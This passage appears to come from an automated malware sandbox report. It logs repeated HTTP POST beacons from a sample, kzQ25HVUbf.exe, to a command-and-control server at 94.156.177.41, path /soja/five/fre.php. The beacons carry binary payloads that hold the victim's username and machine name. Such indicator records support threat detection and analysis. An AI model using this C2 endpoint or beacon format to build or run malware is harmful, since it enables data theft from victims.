                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:49.710357904 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:50.432254076 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:50 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              37192.168.2.95001694.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:50.584074974 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:50.589001894 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:51.359774113 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:51 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              38192.168.2.95001794.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:51.528808117 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:51.533741951 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:52.255506039 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:52 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              39192.168.2.95001894.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:52.415730000 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:52.420648098 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:53.124048948 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:53 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              40192.168.2.95001994.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:53.276341915 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:53.281289101 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:54.003082037 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:53 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              41192.168.2.95002094.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:54.144908905 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:54.149795055 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:54.849924088 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:54 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              42192.168.2.95002194.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:55.442534924 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:55.447402000 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:56.132185936 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:56 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              43192.168.2.95002294.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:56.291718006 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:56.296588898 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:57.012861013 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:56 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              44192.168.2.95002394.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:57.163176060 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:57.168024063 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:57.903196096 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:57 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              45192.168.2.95002494.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:58.103395939 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:58.108289957 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:58.830260038 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:58 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              46192.168.2.95002594.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:58.992737055 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:58.997731924 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:59.712804079 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:59 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              47192.168.2.95002794.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:59.876507044 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:59.881351948 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:00.754713058 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:00 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              48192.168.2.95002894.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:00.918942928 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:00.923865080 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:01.623123884 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:01 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              49192.168.2.95002994.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:01.796801090 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:01.801641941 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:02.493860006 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:02 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              50192.168.2.95003094.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:02.924700975 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:02.929553986 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:03.624018908 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:03 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              51192.168.2.95003194.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:03.783593893 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:03.788439989 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:04.490525961 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:04 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              52192.168.2.95003294.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:04.649859905 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:04.654751062 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:05.394815922 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:05 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              53192.168.2.95003394.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:05.731822014 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:05.736766100 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:06.454509974 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:06 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              54192.168.2.95003494.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:06.631606102 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:06.637552977 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:07.370358944 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:07 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              55192.168.2.95003594.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:07.538527012 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:07.543493032 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:08.253726959 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:08 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              56192.168.2.95003694.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:08.530126095 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:08.535137892 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:09.255610943 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:09 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              57192.168.2.95003794.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:09.425780058 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
